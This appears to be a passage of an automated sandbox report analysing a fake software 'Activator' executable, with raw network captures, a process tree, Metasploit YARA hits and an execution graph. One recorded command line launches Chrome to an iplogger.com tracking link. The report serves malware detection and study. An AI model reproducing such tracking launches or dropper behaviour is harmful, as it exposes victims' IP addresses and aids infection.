                                                                                                                                                                                                                                                2024-10-03 14:09:33 UTC1369INData Raw: 79 37 6d 50 7a 62 75 79 6b 49 65 6c 74 4c 48 51 75 4b 6d 70 32 74 33 58 71 37 62 53 74 37 7a 53 77 65 54 44 75 36 4f 33 74 37 2f 66 77 4f 54 6f 71 72 4c 51 77 74 50 58 32 64 62 6f 73 37 76 4f 31 37 7a 71 38 73 44 74 77 77 4c 76 35 73 53 37 32 65 6a 6c 42 65 7a 64 34 50 34 49 46 4f 72 56 47 42 66 58 46 77 51 54 31 65 6e 38 2f 42 44 36 45 4f 4c 37 44 69 45 44 34 67 4d 72 34 69 30 41 4a 50 6b 61 41 53 49 69 4c 43 4d 33 4d 68 49 36 4e 66 67 4c 2b 77 77 71 46 42 56 44 48 42 4d 62 4b 45 67 52 4a 30 67 5a 53 43 4a 4f 52 6b 45 2b 4c 53 67 71 44 56 46 41 54 53 6c 61 4e 44 6f 37 54 6c 4d 2f 4c 55 4a 69 57 44 55 6e 61 44 38 2f 62 47 77 72 61 31 30 2f 4c 55 70 69 52 6d 68 57 55 32 63 76 4d 45 73 36 4e 31 56 4f 67 45 46 2b 65 47 52 65 5a 32 56 57 56 6d 47 4b 68 6f 74
                                                                                                                                                                                                                                                Data Ascii: y7mPzbuykIeltLHQuKmp2t3Xq7bSt7zSweTDu6O3t7/fwOToqrLQwtPX2dbos7vO17zq8sDtwwLv5sS72ejlBezd4P4IFOrVGBfXFwQT1en8/BD6EOL7DiED4gMr4i0AJPkaASIiLCM3MhI6NfgL+wwqFBVDHBMbKEgRJ0gZSCJORkE+LSgqDVFATSlaNDo7TlM/LUJiWDUnaD8/bGwra10/LUpiRmhWU2cvMEs6N1VOgEF+eGReZ2VWVmGKhot
                                                                                                                                                                                                                                                2024-10-03 14:09:33 UTC1369INData Raw: 4b 6d 73 6b 4e 58 42 30 4c 53 55 30 4a 58 57 30 74 54 63 76 64 2f 43 35 5a 2f 6a 34 61 4c 45 32 4f 50 68 37 65 2f 46 79 4b 7a 78 33 65 7a 51 73 4f 79 78 38 75 37 77 37 4e 6e 37 33 67 4b 38 41 50 32 2b 2f 4f 50 58 31 2b 6a 71 7a 41 7a 61 44 41 76 4c 44 4f 41 42 39 77 50 71 2b 75 73 4a 36 42 66 57 43 76 44 62 31 4e 77 53 2b 66 66 64 46 4f 51 45 4b 52 6b 6b 44 43 34 61 4a 75 51 7a 4c 77 59 49 38 53 67 49 2b 76 67 73 48 51 67 38 4b 67 41 32 2b 6a 38 6d 4e 30 59 33 50 7a 63 59 4e 67 68 48 48 54 73 67 44 31 46 52 4e 6c 4e 58 53 45 49 55 4b 31 63 75 4d 53 39 4e 4d 6c 38 67 56 46 39 6e 5a 32 67 70 52 6a 68 74 61 45 6b 71 59 46 73 39 64 47 39 57 59 7a 4a 34 4f 56 5a 49 66 58 68 5a 66 59 46 73 61 34 4b 44 66 49 49 2f 65 47 70 6c 58 33 5a 4d 58 56 32 4f 55 45 6c 6b
                                                                                                                                                                                                                                                Data Ascii: KmskNXB0LSU0JXW0tTcvd/C5Z/j4aLE2OPh7e/FyKzx3ezQsOyx8u7w7Nn73gK8AP2+/OPX1+jqzAzaDAvLDOAB9wPq+usJ6BfWCvDb1NwS+ffdFOQEKRkkDC4aJuQzLwYI8SgI+vgsHQg8KgA2+j8mN0Y3PzcYNghHHTsgD1FRNlNXSEIUK1cuMS9NMl8gVF9nZ2gpRjhtaEkqYFs9dG9WYzJ4OVZIfXhZfYFsa4KDfII/eGplX3ZMXV2OUElk
                                                                                                                                                                                                                                                2024-10-03 14:09:33 UTC1369INData Raw: 62 63 73 62 6d 77 33 73 75 74 73 65 54 50 73 61 2f 6f 34 61 53 2b 36 39 66 4a 77 65 2b 77 36 37 2f 7a 37 39 58 41 38 65 50 33 78 50 76 33 38 38 30 41 77 50 76 57 42 63 54 32 41 77 6b 45 39 39 34 4d 39 77 6a 59 45 65 55 49 33 42 58 39 30 4f 6b 5a 37 52 44 6e 47 2f 48 74 37 43 45 4d 45 78 38 6b 35 42 7a 31 4b 65 67 6f 39 79 33 73 47 50 67 71 48 43 51 42 4e 66 51 6b 41 54 63 6b 4c 41 51 37 4b 43 63 37 51 52 59 4f 46 30 51 61 50 42 5a 48 4e 45 51 56 53 7a 59 4a 49 31 45 6d 51 43 64 56 51 45 41 68 57 52 6c 51 4b 31 5a 49 58 43 39 68 4e 6b 49 74 59 31 41 32 4f 47 6c 55 59 32 64 74 61 47 77 39 62 31 78 77 52 33 55 31 55 6b 46 35 59 6a 56 4f 65 32 68 34 54 49 46 38 54 6c 57 45 63 48 78 59 67 6e 52 71 58 59 31 4e 6a 47 4f 52 55 58 4a 69 6c 4a 42 31 6b 35 6c 5a 69
                                                                                                                                                                                                                                                Data Ascii: bcsbmw3sutseTPsa/o4aS+69fJwe+w67/z79XA8eP3xPv3880AwPvWBcT2AwkE994M9wjYEeUI3BX90OkZ7RDnG/Ht7CEMEx8k5Bz1Kego9y3sGPgqHCQBNfQkATckLAQ7KCc7QRYOF0QaPBZHNEQVSzYJI1EmQCdVQEAhWRlQK1ZIXC9hNkItY1A2OGlUY2dtaGw9b1xwR3U1UkF5YjVOe2h4TIF8TlWEcHxYgnRqXY1NjGORUXJilJB1k5lZi
                                                                                                                                                                                                                                                2024-10-03 14:09:33 UTC1369INData Raw: 33 30 39 37 43 31 75 66 6e 71 4d 69 68 36 61 79 34 72 2b 33 62 30 50 44 7a 74 4d 54 31 38 76 50 72 78 39 76 51 2f 64 2f 2b 39 75 30 41 39 4d 50 54 34 77 62 64 41 4e 58 70 34 4d 66 61 43 73 72 4b 79 76 33 50 2f 75 51 44 42 4f 76 33 46 78 63 67 37 79 44 66 37 4f 30 55 33 78 66 36 4a 51 63 54 36 67 73 69 41 67 45 51 42 4f 6f 4e 4d 67 4d 75 4b 44 6b 48 4f 7a 63 5a 45 54 34 6f 49 54 77 2b 4c 6a 34 6a 48 51 63 6e 50 68 34 65 4c 43 41 48 4b 6b 34 66 53 6b 52 55 4d 31 64 54 4e 45 4e 61 52 44 31 59 4f 45 70 61 50 6d 4d 6a 51 31 6f 36 4e 30 67 38 49 30 4e 71 4f 32 5a 67 63 47 56 30 50 6d 41 76 4e 45 74 7a 56 32 63 37 66 57 68 53 54 34 42 72 51 32 4f 44 65 58 4f 49 67 34 4e 56 56 6e 78 49 66 32 4f 4e 62 6c 42 54 63 6c 56 6f 6c 6f 52 59 61 6d 79 63 58 46 39 2f 6d 33
                                                                                                                                                                                                                                                Data Ascii: 3097C1ufnqMih6ay4r+3b0PDztMT18vPrx9vQ/d/+9u0A9MPT4wbdANXp4MfaCsrKyv3P/uQDBOv3Fxcg7yDf7O0U3xf6JQcT6gsiAgEQBOoNMgMuKDkHOzcZET4oITw+Lj4jHQcnPh4eLCAHKk4fSkRUM1dTNENaRD1YOEpaPmMjQ1o6N0g8I0NqO2ZgcGV0PmAvNEtzV2c7fWhST4BrQ2ODeXOIg4NVVnxIf2ONblBTclVoloRYamycXF9/m3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.6 | 49754 | 104.18.95.41 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:33 UTC | 487 | OUT | GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1300389161:1727962023:QSoqQkjz0PpYr1szVnKI7X7Fbyyo_-jod5ykE5mZtpI/8ccd8289bc184228/6e64b4d206e3507 HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
2024-10-03 14:09:33 UTC | 349 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:33 GMT
                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-chl-out: QOiLYE8wEsp0SwUdMc704Xr/gSsNVTUxfP4=$G+0B1Zllu6rs3cVR
                                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd82bad9ff43be-EWR
2024-10-03 14:09:33 UTC | 7 | IN | Data Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                Data Ascii: invalid


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.6 | 49755 | 20.12.23.50 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:54 UTC | 306 | OUT | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=KGDWMUGzXSzGHLb&MD=tbZlVl+h HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                Host: slscr.update.microsoft.com
2024-10-03 14:09:54 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                                                                MS-CorrelationId: 355ab080-9d74-43f8-99d4-a6ac73cb711b
                                                                                                                                                                                                                                                MS-RequestId: abb4026c-e94e-44c8-b227-f56ccc5bfb8d
                                                                                                                                                                                                                                                MS-CV: bWhAE2NSDEOVxncI.0
                                                                                                                                                                                                                                                X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:54 GMT
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Content-Length: 30005


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.6 | 49757 | 35.190.80.1 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:10:22 UTC | 525 | OUT | OPTIONS /report/v4?s=s6r14g6s0T1RrWk2y8Ac0rqnC%2FLVLKf2EBqQ3omkQ6J8Fu5v2uteSLetEpRzPZwZOe3Cty8FaC55S6Ug9Ti7cB8WbEk0McIbvpsM98kwIN1pc5t2ryHR8THhTApRoqQ%3D HTTP/1.1
                                                                                                                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Origin: https://iplogger.com
                                                                                                                                                                                                                                                Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
2024-10-03 14:10:22 UTC | 336 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                access-control-max-age: 86400
                                                                                                                                                                                                                                                access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                access-control-allow-headers: content-length, content-type
                                                                                                                                                                                                                                                date: Thu, 03 Oct 2024 14:10:22 GMT
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.6 | 49758 | 35.190.80.1 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:10:22 UTC | 537 | OUT | OPTIONS /report/v4?s=8QZ0N5GYE%2FQjzGUJlP62kh8Njave9zbqER%2BeJnNlnXQEFViktq7fh2msQPW%2BH7EOrMbGiERjfuF5tX%2Fjmt91iBNAC1V76eA1aIGOMD%2Fz9L%2BGU3Kj4C%2BIDjDLNXyDzbQ%3D HTTP/1.1
                                                                                                                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Origin: https://iplogger.com
                                                                                                                                                                                                                                                Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:10:22 UTC | 336 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                access-control-max-age: 86400
                                                                                                                                                                                                                                                access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                access-control-allow-headers: content-type, content-length
                                                                                                                                                                                                                                                date: Thu, 03 Oct 2024 14:10:22 GMT
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                32 | 192.168.2.6 | 49760 | 35.190.80.1 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                2024-10-03 14:10:22 UTC | 470 | OUT | POST /report/v4?s=s6r14g6s0T1RrWk2y8Ac0rqnC%2FLVLKf2EBqQ3omkQ6J8Fu5v2uteSLetEpRzPZwZOe3Cty8FaC55S6Ug9Ti7cB8WbEk0McIbvpsM98kwIN1pc5t2ryHR8THhTApRoqQ%3D HTTP/1.1
                                                                                                                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 394
                                                                                                                                                                                                                                                Content-Type: application/reports+json
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:10:22 UTC394OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 38 38 39 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 30 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 38 38 2e 31 37 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 69 70 6c 6f 67 67 65 72 2e 63
                                                                                                                                                                                                                                                Data Ascii: [{"age":58892,"body":{"elapsed_time":1101,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.188.178","status_code":403,"type":"http.error"},"type":"network-error","url":"https://iplogger.c
                                                                                                                                                                                                                                                2024-10-03 14:10:22 UTC | 168 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                date: Thu, 03 Oct 2024 14:10:22 GMT
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                33 | 192.168.2.6 | 49759 | 35.190.80.1 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                2024-10-03 14:10:22 UTC | 482 | OUT | POST /report/v4?s=8QZ0N5GYE%2FQjzGUJlP62kh8Njave9zbqER%2BeJnNlnXQEFViktq7fh2msQPW%2BH7EOrMbGiERjfuF5tX%2Fjmt91iBNAC1V76eA1aIGOMD%2Fz9L%2BGU3Kj4C%2BIDjDLNXyDzbQ%3D HTTP/1.1
                                                                                                                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                                                                Content-Type: application/reports+json
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:10:22 UTC524OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 34 37 37 33 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 32 38 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 37 36 2e 35 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 69 70 6c 6f 67 67 65 72 2e 63 6f 6d
                                                                                                                                                                                                                                                Data Ascii: [{"age":54773,"body":{"elapsed_time":1289,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.76.57","status_code":404,"type":"http.error"},"type":"network-error","url":"https://iplogger.com
                                                                                                                                                                                                                                                2024-10-03 14:10:22 UTC | 168 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                date: Thu, 03 Oct 2024 14:10:22 GMT
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                Start time:10:08:58
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\Activator by URKE v2.5.exe"
                                                                                                                                                                                                                                                Imagebase:0x7ff7e5ef0000
                                                                                                                                                                                                                                                File size:25'037'648 bytes
                                                                                                                                                                                                                                                MD5 hash:95D5F32AFD610E2E7077BD350EAC99C0
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                Start time:10:09:01
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe"
                                                                                                                                                                                                                                                Imagebase:0x720000
                                                                                                                                                                                                                                                File size:17'110'528 bytes
                                                                                                                                                                                                                                                MD5 hash:2706AC6F789E6BDBDA8DAE9D8460FEC8
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000002.00000003.2196083271.0000000002C7C000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                                • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000002.00000002.2287277784.0000000002C7C000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 62%, ReversingLabs
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                Start time:10:09:10
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                                                                                                                Imagebase:0x540000
                                                                                                                                                                                                                                                File size:231'736 bytes
                                                                                                                                                                                                                                                MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                                Start time:10:09:18
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.com/1KhnJ4
                                                                                                                                                                                                                                                Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                                Start time:10:09:19
                                                                                                                                                                                                                                                Start date:03/10/2024
                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2008,i,1522399523458594779,8666875280555869033,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false


                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:13.4%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                  Signature Coverage:31.5%
                                                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                                                  Total number of Limit Nodes:35
7ff7e5f04d74 104 API calls 23105->23107 23111 7ff7e5f04168 23106->23111 23187 7ff7e5ef3c7c 82 API calls 23106->23187 23107->23106 23108 7ff7e5f15c30 _handle_error 8 API calls 23112 7ff7e5f042f0 23108->23112 23109 7ff7e5f04000 23110 7ff7e5f04940 106 API calls 23109->23110 23122 7ff7e5f03efc 23109->23122 23113 7ff7e5f04013 23110->23113 23130 7ff7e5f041fd 23111->23130 23188 7ff7e5f08db4 8 API calls 23111->23188 23116 7ff7e5ef5790 51 API calls 23113->23116 23116->23122 23118 7ff7e5f04244 23119 7ff7e5f042c1 23118->23119 23121 7ff7e5f042cf 23118->23121 23190 7ff7e5ef4e00 SetEndOfFile 23118->23190 23119->23121 23161 7ff7e5f04940 23119->23161 23121->23122 23126 7ff7e5ef5790 51 API calls 23121->23126 23122->23108 23123->23105 23171 7ff7e5f0511c 23123->23171 23180 7ff7e5f000f0 23123->23180 23183 7ff7e5f04d74 23123->23183 23126->23122 23128 7ff7e5f0418e 23129 7ff7e5f0511c 120 API calls 23128->23129 23128->23130 23129->23128 23130->23118 23189 7ff7e5ef38e0 82 API calls 2 library calls 23130->23189 23131->23093 23132->23089 23134 7ff7e5ef6288 55 API calls 23133->23134 23135 7ff7e5f04f42 23134->23135 23136 7ff7e5f04f5b 23135->23136 23138 7ff7e5f04f53 23135->23138 23137 7ff7e5f15ae0 4 API calls 23136->23137 23140 7ff7e5f04f65 23137->23140 23191 7ff7e5ef5db0 51 API calls 2 library calls 23138->23191 23141 7ff7e5ef4334 51 API calls 23140->23141 23143 7ff7e5f04f94 23141->23143 23142 7ff7e5f04ffb 23144 7ff7e5f15c30 _handle_error 8 API calls 23142->23144 23143->23142 23145 7ff7e5f05023 23143->23145 23146 7ff7e5f03ec7 23144->23146 23147 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 23145->23147 23146->23088 23146->23090 23148 7ff7e5f05028 23147->23148 23149->23100 23155 7ff7e5f05b99 23150->23155 23151 7ff7e5f0511c 120 API calls 23151->23155 23155->23151 23156 7ff7e5f000f0 SendDlgItemMessageW 23155->23156 23157 7ff7e5f05e0e 23155->23157 23158 7ff7e5f05d91 23155->23158 23160 7ff7e5ef4d50 101 API calls 23155->23160 23192 7ff7e5f06294 23155->23192 23214 7ff7e5f06b60 
